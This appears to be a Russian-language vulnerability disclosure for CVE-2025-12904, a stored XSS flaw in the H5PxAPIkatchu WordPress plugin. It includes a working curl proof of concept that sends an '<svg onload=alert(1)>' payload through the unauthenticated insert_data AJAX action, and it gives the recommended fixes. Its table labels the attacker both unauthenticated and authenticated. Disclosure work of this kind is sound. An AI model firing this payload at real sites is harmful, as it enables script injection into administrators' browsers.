
Раскрытие информации о CVE-2025-12904
Раскрытие для CVE-2025-12904
Этот репозиторий раскрывает уязвимость, обнаруженную в SNORDIAN's H5PxAPIkatchu <= 0.4.16, плагин WordPress, разработанный otacke.
| CVE ID | Тип | Компонент | Воздействие |
|---|
| CVE-2025-12904 | Неаутентифицированный сохраненный межсайтовый скриптинг (XSS) через insert_data | class-table-view.php | Аутентифицированный злоумышленник может выполнить JS |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※ Если id внутри объекта не существует, запрос не удастся.
Функция insert_data() не выполняла никаких проверок разрешений, что позволяло сохранять вредоносный ввод без аутентификации. Кроме того, эти записи отображались без экранирования в интерфейсе администратора.
insert_data() использует current_user_can для предотвращения неавторизованного выполнения.esc_html($value) вместо echo $value позволяет предотвратить выполнение XSS.Было очень трудно создать PoC.
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
Я потратил много времени на воспроизведение этой части. Хочу научиться лучше пользоваться командой curl. Кстати, этот плагин... всё ли с ним в порядке? Особенно, название и так далее.
Имя: MooseLove
Роль: Независимый исследователь безопасности / баг-хантер
Контакт: Доступен по запросу
Это уведомление предоставлено для повышения осведомленности о безопасности. Разрешено свободное распространение с указанием авторства.